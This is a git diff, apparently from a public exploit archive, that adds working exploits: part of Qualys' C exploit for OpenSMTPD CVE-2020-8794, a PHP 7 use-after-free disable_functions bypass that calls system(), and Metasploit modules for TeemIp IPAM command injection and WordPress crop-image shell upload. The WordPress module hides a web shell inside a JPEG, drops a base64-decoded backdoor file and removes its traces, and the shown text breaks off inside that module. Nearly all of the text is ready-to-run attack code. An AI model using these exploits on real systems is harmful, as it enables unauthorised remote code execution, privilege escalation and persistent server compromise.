+main(int argc, char * const * argv)
+{
+    setlinebuf(stdout);
+    puts("LPE and RCE in OpenSMTPD's default install (CVE-2020-8794)");
+    puts("Copyright (C) 2020 Qualys, Inc.");
+
+    int opt;
+    while ((opt = getopt(argc, argv, "c:u:d:m:n")) != -1) {
+        switch (opt) {
+        case 'c':
+            inject.command = optarg;
+            break;
+        case 'u':
+            grammar = OLD_SMTPD_GRAMMAR;
+            inject.user = optarg;
+            break;
+        case 'd':
+            inject.dispatcher = optarg;
+            break;
+        case 'm':
+            grammar = OLD_SMTPD_GRAMMAR;
+            inject.maildir = optarg;
+            break;
+        case 'n':
+            grammar = NEW_SMTPD_GRAMMAR;
+            break;
+        default:
+            die();
+        }
+    }
+
+    if (grammar == NEW_SMTPD_GRAMMAR) {
+        const int len = snprintf(inject.lines, sizeof(inject.lines),
+            "type:mda\nmda-exec:%s\ndispatcher:%s\nmda-user:%s",
+            inject.command, inject.dispatcher, inject.user);
+        if (len <= 0 || (unsigned)len >= sizeof(inject.lines)) die();
+
+    } else if (grammar == OLD_SMTPD_GRAMMAR) {
+        const int len = snprintf(inject.lines, sizeof(inject.lines),
+            "type:mda\nmda-buffer:%s\nmda-method:%s\nmda-user:%s\nmda-usertable:<getpwnam>",
+            inject.maildir ? inject.maildir : inject.command,
+            inject.maildir ? "maildir" : "mda", inject.user);
+        if (len <= 0 || (unsigned)len >= sizeof(inject.lines)) die();
+
+    } else die();
+
+    argc -= optind;
+    argv += optind;
+
+    if (argc == 3) {
+        exploit = SERVER_SIDE_EXPLOIT;
+        client_target = common_getaddrinfo(argv[0], "25");
+        client_mail = argv[1];
+        client_rcpt = argv[2];
+
+    } else if (argc != 0) die();
+
+    server_listen();
+    if (exploit == CLIENT_SIDE_EXPLOIT) {
+        server_session(inject.lines);
+
+    } else if (exploit == SERVER_SIDE_EXPLOIT) {
+        client_session();
+        unsigned try;
+        for (try = 0; try < 1; try++) {
+            server_session(NULL);
+            puts("\nPlease wait for OpenSMTPD to connect back...");
+        }
+        server_session(inject.lines);
+        client_session();
+        server_session("type:invalid");
+
+    } else die();
+    exit(EXIT_SUCCESS);
+}
\ No newline at end of file
diff --git a/exploits/php/local/48072.php b/exploits/php/local/48072.php
new file mode 100644
index 000000000..d9b63deb9
--- /dev/null
+++ b/exploits/php/local/48072.php
@@ -0,0 +1,218 @@
+<?php
+
+# PHP 7.0-7.4 disable_functions bypass PoC (*nix only)
+#
+# Bug: https://bugs.php.net/bug.php?id=76047
+# debug_backtrace() returns a reference to a variable 
+# that has been destroyed, causing a UAF vulnerability.
+#
+# This exploit should work on all PHP 7.0-7.4 versions
+# released as of 30/01/2020.
+#
+# Author: https://github.com/mm0r1
+
+pwn("uname -a");
+
+function pwn($cmd) {
+    global $abc, $helper, $backtrace;
+
+    class Vuln {
+        public $a;
+        public function __destruct() { 
+            global $backtrace; 
+            unset($this->a);
+            $backtrace = (new Exception)->getTrace(); # ;)
+            if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
+                $backtrace = debug_backtrace();
+            }
+        }
+    }
+
+    class Helper {
+        public $a, $b, $c, $d;
+    }
+
+    function str2ptr(&$str, $p = 0, $s = 8) {
+        $address = 0;
+        for($j = $s-1; $j >= 0; $j--) {
+            $address <<= 8;
+            $address |= ord($str[$p+$j]);
+        }
+        return $address;
+    }
+
+    function ptr2str($ptr, $m = 8) {
+        $out = "";
+        for ($i=0; $i < $m; $i++) {
+            $out .= chr($ptr & 0xff);
+            $ptr >>= 8;
+        }
+        return $out;
+    }
+
+    function write(&$str, $p, $v, $n = 8) {
+        $i = 0;
+        for($i = 0; $i < $n; $i++) {
+            $str[$p + $i] = chr($v & 0xff);
+            $v >>= 8;
+        }
+    }
+
+    function leak($addr, $p = 0, $s = 8) {
+        global $abc, $helper;
+        write($abc, 0x68, $addr + $p - 0x10);
+        $leak = strlen($helper->a);
+        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
+        return $leak;
+    }
+
+    function parse_elf($base) {
+        $e_type = leak($base, 0x10, 2);
+
+        $e_phoff = leak($base, 0x20);
+        $e_phentsize = leak($base, 0x36, 2);
+        $e_phnum = leak($base, 0x38, 2);
+
+        for($i = 0; $i < $e_phnum; $i++) {
+            $header = $base + $e_phoff + $i * $e_phentsize;
+            $p_type  = leak($header, 0, 4);
+            $p_flags = leak($header, 4, 4);
+            $p_vaddr = leak($header, 0x10);
+            $p_memsz = leak($header, 0x28);
+
+            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
+                # handle pie
+                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
+                $data_size = $p_memsz;
+            } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
+                $text_size = $p_memsz;
+            }
+        }
+
+        if(!$data_addr || !$text_size || !$data_size)
+            return false;
+
+        return [$data_addr, $text_size, $data_size];
+    }
+
+    function get_basic_funcs($base, $elf) {
+        list($data_addr, $text_size, $data_size) = $elf;
+        for($i = 0; $i < $data_size / 8; $i++) {
+            $leak = leak($data_addr, $i * 8);
+            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
+                $deref = leak($leak);
+                # 'constant' constant check
+                if($deref != 0x746e6174736e6f63)
+                    continue;
+            } else continue;
+
+            $leak = leak($data_addr, ($i + 4) * 8);
+            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
+                $deref = leak($leak);
+                # 'bin2hex' constant check
+                if($deref != 0x786568326e6962)
+                    continue;
+            } else continue;
+
+            return $data_addr + $i * 8;
+        }
+    }
+
+    function get_binary_base($binary_leak) {
+        $base = 0;
+        $start = $binary_leak & 0xfffffffffffff000;
+        for($i = 0; $i < 0x1000; $i++) {
+            $addr = $start - 0x1000 * $i;
+            $leak = leak($addr, 0, 7);
+            if($leak == 0x10102464c457f) { # ELF header
+                return $addr;
+            }
+        }
+    }
+
+    function get_system($basic_funcs) {
+        $addr = $basic_funcs;
+        do {
+            $f_entry = leak($addr);
+            $f_name = leak($f_entry, 0, 6);
+
+            if($f_name == 0x6d6574737973) { # system
+                return leak($addr + 8);
+            }
+            $addr += 0x20;
+        } while($f_entry != 0);
+        return false;
+    }
+
+    function trigger_uaf($arg) {
+        # str_shuffle prevents opcache string interning
+        $arg = str_shuffle(str_repeat('A', 79));
+        $vuln = new Vuln();
+        $vuln->a = $arg;
+    }
+
+    if(stristr(PHP_OS, 'WIN')) {
+        die('This PoC is for *nix systems only.');
+    }
+
+    $n_alloc = 10; # increase this value if UAF fails
+    $contiguous = [];
+    for($i = 0; $i < $n_alloc; $i++)
+        $contiguous[] = str_shuffle(str_repeat('A', 79));
+
+    trigger_uaf('x');
+    $abc = $backtrace[1]['args'][0];
+
+    $helper = new Helper;
+    $helper->b = function ($x) { };
+
+    if(strlen($abc) == 79 || strlen($abc) == 0) {
+        die("UAF failed");
+    }
+
+    # leaks
+    $closure_handlers = str2ptr($abc, 0);
+    $php_heap = str2ptr($abc, 0x58);
+    $abc_addr = $php_heap - 0xc8;
+
+    # fake value
+    write($abc, 0x60, 2);
+    write($abc, 0x70, 6);
+
+    # fake reference
+    write($abc, 0x10, $abc_addr + 0x60);
+    write($abc, 0x18, 0xa);
+
+    $closure_obj = str2ptr($abc, 0x20);
+
+    $binary_leak = leak($closure_handlers, 8);
+    if(!($base = get_binary_base($binary_leak))) {
+        die("Couldn't determine binary base address");
+    }
+
+    if(!($elf = parse_elf($base))) {
+        die("Couldn't parse ELF header");
+    }
+
+    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
+        die("Couldn't get basic_functions address");
+    }
+
+    if(!($zif_system = get_system($basic_funcs))) {
+        die("Couldn't get zif_system address");
+    }
+
+    # fake closure object
+    $fake_obj_offset = 0xd0;
+    for($i = 0; $i < 0x110; $i += 8) {
+        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
+    }
+
+    # pwn
+    write($abc, 0x20, $abc_addr + $fake_obj_offset);
+    write($abc, 0xd0 + 0x38, 1, 4); # internal func type
+    write($abc, 0xd0 + 0x68, $zif_system); # internal func handler
+
+    ($helper->b)($cmd);
+    exit();
+}
\ No newline at end of file
diff --git a/exploits/php/remote/46641.rb b/exploits/php/remote/46641.rb
new file mode 100755
index 000000000..d8481759a
--- /dev/null
+++ b/exploits/php/remote/46641.rb
@@ -0,0 +1,152 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "TeemIp IPAM < 2.4.0 - 'new_config' Command Injection",
+      'Description' => %q(
+        This module exploits a command injection vulnerability in TeemIp
+        versions prior to 2.4.0. The "new_config" parameter of "exec.php" 
+        allows you to create a new PHP file with the exception of config information.
+
+        The malicious PHP code sent is executed instantaneously and is not saved on the server.
+        The vulnerability can be exploited by an authorized user (Administrator).
+        Module allows remote command execution by sending php payload with parameter 'new_config'.
+
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
+        ],
+      'References' =>
+        [
+          ['URL', 'http://pentest.com.tr/exploits/TeemIp-IPAM-2-4-0-new-config-Command-Injection-Metasploit.html']
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' => [['Automatic', {}]],
+      'Privileged' => false,
+      'DisclosureDate' => "Apr 03 2019",
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base TeemIp IPAM directory path", '/6']),
+        OptString.new('USERNAME', [true, "Username to authenticate with", 'admin']),
+        OptString.new('PASSWORD', [false, "Password to authenticate with", 'admin'])
+      ]
+    )
+  end
+##
+# Login and cookie information gathering
+##
+  def do_login
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'pages', 'UI.php'),
+      'vars_post' => {
+        'auth_user' => datastore['username'],
+        'auth_pwd' => datastore['password'],
+        'loginop' => 'login'
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Connection error occurred!')
+    end
+
+    if res.code == 200 && (res.body =~ /Logged in as/)
+      print_good("Authentication was successful")
+      @cookies = res.get_cookies
+      return 
+    else
+      fail_with(Failure::NoAccess, 'Authentication was unsuccessful')     
+    end  
+  end
+
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+##
+# Exploitation process with prepared information
+##
+  def exploit
+    unless Exploit::CheckCode::Appears == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+
+    @cookies = nil
+    do_login
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri, 'pages', 'exec.php?exec_module=itop-config&exec_page=config.php&exec_env=production&c%5Bmenu%5D=ConfigEditor'),
+      'headers' => {
+        'Cookie' => @cookies
+      }
+    )
+
+    if res and res.code == 200 and res.body =~ /Identify yourself/
+      return do_login
+    else 
+      transid = res.body.split('transaction_id" value="')[1].split('"')[0]
+      print_good("transaction_id : #{transid}")
+    end
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'pages', 'exec.php?exec_module=itop-config&exec_page=config.php&exec_env=production&c%5Bmenu%5D=ConfigEditor'),
+      'vars_post' => {
+          "operation" => "save",
+          "transaction_id" => transid,
+          "prev_config" => "exec",
+          "new_config" => payload.encoded
+       },
+      'headers' => {
+        'Cookie' => @cookies
+      }
+    )
+    handler
+
+  end
+##
+# Version and Vulnerability Check
+##
+  def check
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'pages', 'ajax.render.php'),
+      'vars_post' => {
+          "operation" => "about_box"
+      }
+    )
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    if res.code == 200
+      version = res.body.split('iTop version ')[1].split('" src=')[0]
+      if version < '2.4.1'
+       print_status("#{peer} - Teemip Version is #{version}")
+       return Exploit::CheckCode::Appears
+      end
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+##
+# End
+##
+end
\ No newline at end of file
diff --git a/exploits/php/remote/46662.rb b/exploits/php/remote/46662.rb
new file mode 100755
index 000000000..a64481723
--- /dev/null
+++ b/exploits/php/remote/46662.rb
@@ -0,0 +1,455 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress Crop-image Shell Upload',
+      'Description'     => %q{
+          This module exploits a path traversal and a local file inclusion
+          vulnerability on WordPress versions 5.0.0 and <= 4.9.8.
+          The crop-image function allows a user, with at least author privileges,
+          to resize an image and perform a path traversal by changing the _wp_attached_file
+          reference during the upload. The second part of the exploit will include
+          this image in the current theme by changing the _wp_page_template attribute
+          when creating a post.
+
+          This exploit module only works for Unix-based systems currently.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+      [
+        'RIPSTECH Technology',                               # Discovery
+        'Wilfried Becard <wilfried.becard@synacktiv.com>'    # Metasploit module
+      ],
+    'References'      =>
+      [
+        [ 'CVE', '2019-8942' ],
+        [ 'CVE', '2019-8943' ],
+        [ 'URL', 'https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/']
+      ],
+      'DisclosureDate'  => 'Feb 19 2019',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['WordPress', {}]],
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
+        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
+      ])
+  end
+
+  def check
+    cookie = wordpress_login(username, password)
+    if cookie.nil?
+      store_valid_credential(user: username, private: password, proof: cookie)
+      return CheckCode::Safe
+    end
+
+    CheckCode::Appears
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def get_wpnonce(cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'media-new.php')
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => uri,
+      'cookie' => cookie
+    )
+    if res && res.code == 200 && res.body && !res.body.empty?
+      res.get_hidden_inputs.first["_wpnonce"]
+    end
+  end
+
+  def get_wpnonce2(image_id, cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => uri,
+      'cookie'    => cookie,
+      'vars_get'  => {
+        'post'   => image_id,
+        'action' => "edit"
+      }
+    )
+    if res && res.code == 200 && res.body && !res.body.empty?
+      tmp = res.get_hidden_inputs
+      wpnonce2 = tmp[1].first[1]
+    end
+  end
+
+  def get_current_theme
+    uri = normalize_uri(datastore['TARGETURI'])
+    res = send_request_cgi!(
+      'method'    => 'GET',
+      'uri'       => uri
+    )
+    fail_with(Failure::NotFound, 'Failed to access Wordpress page to retrieve theme.') unless res && res.code == 200 && res.body && !res.body.empty?
+
+    theme = res.body.scan(/\/wp-content\/themes\/(\w+)\//).flatten.first
+    fail_with(Failure::NotFound, 'Failed to retrieve theme') unless theme
+
+    theme
+  end
+
+  def get_ajaxnonce(cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => uri,
+      'cookie' => cookie,
+      'vars_post'  => {
+        'action' => 'query-attachments',
+        'post_id' => '0',
+        'query[item]' => '43',
+        'query[orderby]' => 'date',
+        'query[order]' => 'DESC',
+        'query[posts_per_page]' => '40',
+        'query[paged]' => '1'
+      }
+    )
+    fail_with(Failure::NotFound, 'Unable to reach page to retrieve the ajax nonce') unless res && res.code == 200 && res.body && !res.body.empty?
+    a_nonce = res.body.scan(/"edit":"(\w+)"/).flatten.first
+    fail_with(Failure::NotFound, 'Unable to retrieve the ajax nonce') unless a_nonce
+
+    a_nonce
+  end
+
+  def upload_file(img_name, wp_nonce, cookie)
+    img_data = %w[
+      FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 60 00 60 00 00 FF ED 00 38 50 68 6F
+      74 6F 73 68 6F 70 20 33 2E 30 00 38 42 49 4D 04 04 00 00 00 00 00 1C 1C 02 74 00
+      10 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B 3F 3E 1C 02 00 00 02 00 04 FF FE 00
+      3B 43 52 45 41 54 4F 52 3A 20 67 64 2D 6A 70 65 67 20 76 31 2E 30 20 28 75 73 69
+      6E 67 20 49 4A 47 20 4A 50 45 47 20 76 38 30 29 2C 20 71 75 61 6C 69 74 79 20 3D
+      20 38 32 0A FF DB 00 43 00 06 04 04 05 04 04 06 05 05 05 06 06 06 07 09 0E 09 09
+      08 08 09 12 0D 0D 0A 0E 15 12 16 16 15 12 14 14 17 1A 21 1C 17 18 1F 19 14 14 1D
+      27 1D 1F 22 23 25 25 25 16 1C 29 2C 28 24 2B 21 24 25 24 FF DB 00 43 01 06 06 06
+      09 08 09 11 09 09 11 24 18 14 18 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24
+      24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24
+      24 24 24 24 24 24 24 FF C0 00 11 08 00 C0 01 06 03 01 22 00 02 11 01 03 11 01 FF
+      C4 00 1F 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06
+      07 08 09 0A 0B FF C4 00 B5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7D 01
+      02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 A1 08 23 42 B1 C1
+      15 52 D1 F0 24 33 62 72 82 09 0A 16 17 18 19 1A 25 26 27 28 29 2A 34 35 36 37 38
+      39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A 73
+      74 75 76 77 78 79 7A 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2 A3 A4
+      A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2 D3 D4
+      D5 D6 D7 D8 D9 DA E1 E2 E3 E4 E5 E6 E7 E8 E9 EA F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FF
+      C4 00 1F 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06
+      07 08 09 0A 0B FF C4 00 B5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00
+      01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 A1 B1 C1 09
+      23 33 52 F0 15 62 72 D1 0A 16 24 34 E1 25 F1 17 18 19 1A 26 27 28 29 2A 35 36 37
+      38 39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A
+      73 74 75 76 77 78 79 7A 82 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2
+      A3 A4 A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2
+      D3 D4 D5 D6 D7 D8 D9 DA E2 E3 E4 E5 E6 E7 E8 E9 EA F2 F3 F4 F5 F6 F7 F8 F9 FA FF
+      DA 00 0C 03 01 00 02 11 03 11 00 3F 00 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B
+      3F 3E
+    ]
+    img_data = [img_data.join].pack('H*')
+    img_name += '.jpg'
+
+    boundary = "#{rand_text_alphanumeric(rand(10) + 5)}"
+    post_data = "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"name\"\r\n"
+    post_data << "\r\n#{img_name}\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"action\"\r\n"
+    post_data << "\r\nupload-attachment\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"_wpnonce\"\r\n"
+    post_data << "\r\n#{wp_nonce}\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"async-upload\"; filename=\"#{img_name}\"\r\n"
+    post_data << "Content-Type: image/jpeg\r\n"
+    post_data << "\r\n#{img_data}\r\n"
+    post_data << "--#{boundary}--\r\n"
+    print_status("Uploading payload")
+    upload_uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php')
+
+    res = send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => upload_uri,
+      'ctype'    => "multipart/form-data; boundary=#{boundary}",
+      'data'     => post_data,
+      'cookie'   => cookie
+    )
+    fail_with(Failure::UnexpectedReply, 'Unable to upload image') unless res && res.code == 200 && res.body && !res.body.empty?
+    print_good("Image uploaded")
+    res = JSON.parse(res.body)
+    image_id = res["data"]["id"]
+    update_nonce = res["data"]["nonces"]["update"]
+    filename = res["data"]["filename"]
+    return filename, image_id, update_nonce
+  end
+
+  def image_editor(img_name, ajax_nonce, image_id, cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => uri,
+      'cookie' => cookie,
+      'vars_post'  => {
+        'action' => 'image-editor',
+        '_ajax_nonce' => ajax_nonce,
+        'postid' => image_id,
+        'history' => '[{"c":{"x":0,"y":0,"w":400,"h":300}}]',
+        'target' => 'all',
+        'context' => '',
+        'do' => 'save'
+      }
+    )
+    fail_with(Failure::NotFound, 'Unable to access page to retrieve filename') unless res && res.code == 200 && res.body && !res.body.empty?
+    filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first
+    fail_with(Failure::NotFound, 'Unable to retrieve file name') unless filename
+
+    filename << '.jpg'
+  end
+
+  def change_path(wpnonce2, image_id, filename, current_date, path, cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
+    res = send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => uri,
+      'cookie' => cookie,
+      'vars_post'  => {
+        '_wpnonce' => wpnonce2,
+        'action' => 'editpost',
+        'post_ID' => image_id,
+        'meta_input[_wp_attached_file]' => "#{current_date}#{filename}#{path}"
+      }
+    )
+  end
+
+  def crop_image(image_id, ajax_nonce, cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
+    res = send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => uri,
+      'cookie' => cookie,
+      'vars_post'  => {
+        'action' => 'crop-image',
+        '_ajax_nonce' => ajax_nonce,
+        'id' => image_id,
+        'cropDetails[x1]' => 0,
+        'cropDetails[y1]' => 0,
+        'cropDetails[width]' => 400,
+        'cropDetails[height]' => 300,
+        'cropDetails[dst_width]' => 400,
+        'cropDetails[dst_height]' => 300
+      }
+    )
+  end
+
+  def include_theme(shell_name, cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post-new.php')
+    res = send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => uri,
+      'cookie' => cookie
+    )
+    if res && res.code == 200 && res.body && !res.body.empty?
+      wpnonce2 = res.body.scan(/name="_wpnonce" value="(\w+)"/).flatten.first
+      post_id = res.body.scan(/"post":{"id":(\w+),/).flatten.first
+      fail_with(Failure::NotFound, 'Unable to retrieve the second wpnonce and the post id') unless wpnonce2 && post_id
+
+      post_title = Rex::Text.rand_text_alpha(10)
+      uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
+      res = send_request_cgi(
+        'method'   => 'POST',
+        'uri'      => uri,
+        'cookie' => cookie,
+        'vars_post'  => {
+          '_wpnonce'=> wpnonce2,
+          'action' => 'editpost',
+          'post_ID' => post_id,
+          'post_title' => post_title,
+          'post_name' => post_title,
+          'meta_input[_wp_page_template]' => "cropped-#{shell_name}.jpg"
+        }
+      )
+      fail_with(Failure::NotFound, 'Failed to retrieve post id') unless res && res.code == 302
+      post_id
+    end
+  end
+
+  def check_for_base64(cookie, post_id)
+    uri = normalize_uri(datastore['TARGETURI'])
+    # Test if base64 is on target
+    test_string = 'YmFzZTY0c3BvdHRlZAo='
+    res = send_request_cgi!(
+      'method'   => 'GET',
+      'uri'      => uri,
+      'cookie' => cookie,
+      'vars_get' => {
+        'p' => post_id,
+        '0' => "echo #{test_string} | base64 -d"
+      }
+    )
+    fail_with(Failure::NotFound, 'Unable to retrieve response to base64 command') unless res && res.code == 200 && !res.body.empty?
+
+    fail_with(Failure::NotFound, "Can't find base64 decode on target") unless res.body.include?("base64spotted")
+    # Execute payload with base64 decode
+    @backdoor = Rex::Text.rand_text_alpha(10)
+    encoded = Rex::Text.encode_base64(payload.encoded)
+    res = send_request_cgi!(
+      'method'   => 'GET',
+      'uri'      => uri,
+      'cookie' => cookie,
+      'vars_get' => {
+        'p' => post_id,
+        '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php"
+      }
+    )
+
+    fail_with(Failure::NotFound, 'Failed to send payload to target') unless res && res.code == 200 && !res.body.empty?
+    send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php"),
+      'cookie'  =>  cookie
+    )
+  end
+
+  def wp_cleanup(shell_name, post_id, cookie)
+    print_status('Attempting to clean up files...')
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => uri,
+      'cookie'    => cookie,
+      'vars_post'  => { 'action' => "query-attachments" }
+    )
+
+    fail_with(Failure::NotFound, 'Failed to receive a response for uploaded file') unless res && res.code == 200 && !res.body.empty?
+    infos = res.body.scan(/id":(\d+),.*filename":"cropped-#{shell_name}".*?"delete":"(\w+)".*"id":(\d+),.*filename":"cropped-x".*?"delete":"(\w+)".*"id":(\d+),.*filename":"#{shell_name}".*?"delete":"(\w+)"/).flatten
+    id1, id2, id3 = infos[0], infos[2], infos[4]
+    delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5]
+    for i in (0...6).step(2)
+      res = send_request_cgi(
+        'method'    => 'POST',
+        'uri'       => uri,
+        'cookie'    => cookie,
+        'vars_post'  => {
+            'action' => "delete-post",
+            'id'     => infos[i],
+            '_wpnonce' => infos[i+1]
+        }
+      )
+    end
+
+    uri1 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'edit.php')
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => uri1,
+      'cookie'    => cookie
+    )
+
+    if res && res.code == 200 && res.body && !res.body.empty?
+      post_nonce = res.body.scan(/post=#{post_id}&action=trash&_wpnonce=(\w+)/).flatten.first
+      fail_with(Failure::NotFound, 'Unable to retrieve post nonce') unless post_nonce
+      uri2 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
+
+      res = send_request_cgi(
+        'method'    => 'GET',
+        'uri'       => uri2,
+        'cookie'    => cookie,
+        'vars_get'  => {
+          'post'     => post_id,
+          'action'   => 'trash',
+          '_wpnonce' => post_nonce
+        }
+      )
+
+      fail_with(Failure::NotFound, 'Unable to retrieve response') unless res && res.code == 302
+      res = send_request_cgi(
+        'method'    => 'GET',
+        'uri'       => uri1,
+        'cookie'    => cookie,
+        'vars_get'  => {
+          'post_status' => "trash",
+          'post_type'   => 'post',
+          '_wpnonce' => post_nonce
+        }
+      )
+
+      if res && res.code == 200 && res.body && !res.body.empty?
+        nonce = res.body.scan(/post=#{post_id}&action=delete&_wpnonce=(\w+)/).flatten.first
+        fail_with(Failure::NotFound, 'Unable to retrieve nonce') unless nonce
+
+        send_request_cgi(
+          'method'    => 'GET',
+          'uri'       => uri2,
+          'cookie'    => cookie,
+          'vars_get'  => {
+            'post'     => post_id,
+            'action'   => 'delete',
+            '_wpnonce' => nonce
+          }
+        )
+      end
+    end
+  end
+
+  def exploit
+    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
+
+    print_status("Authenticating with WordPress using #{username}:#{password}...")
+    cookie = wordpress_login(username, password)
+    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
+    print_good("Authenticated with WordPress")
+    store_valid_credential(user: username, private: password, proof: cookie)
+
+    print_status("Preparing payload...")
+    @current_theme = get_current_theme
+    wp_nonce = get_wpnonce(cookie)
+    @current_date = Time.now.strftime("%Y/%m/")
+
+    img_name = Rex::Text.rand_text_alpha(10)
+    @filename1, image_id, update_nonce = upload_file(img_name, wp_nonce, cookie)
+    ajax_nonce = get_ajaxnonce(cookie)
+
+    @filename1 = image_editor(img_name, ajax_nonce, image_id, cookie)
+    wpnonce2 = get_wpnonce2(image_id, cookie)
+
+    change_path(wpnonce2, image_id, @filename1, @current_date, '?/x', cookie)
+    crop_image(image_id, ajax_nonce, cookie)
+
+    @shell_name = Rex::Text.rand_text_alpha(10)
+    change_path(wpnonce2, image_id, @filename1, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie)
+    crop_image(image_id, ajax_nonce, cookie)
+
+    print_status("Including into theme")
+    post_id = include_theme(@shell_name, cookie)
+
+    check_for_base64(cookie, post_id)
+    wp_cleanup(@shell_name, post_id, cookie)
+  end
+
+  def on_new_session(client)
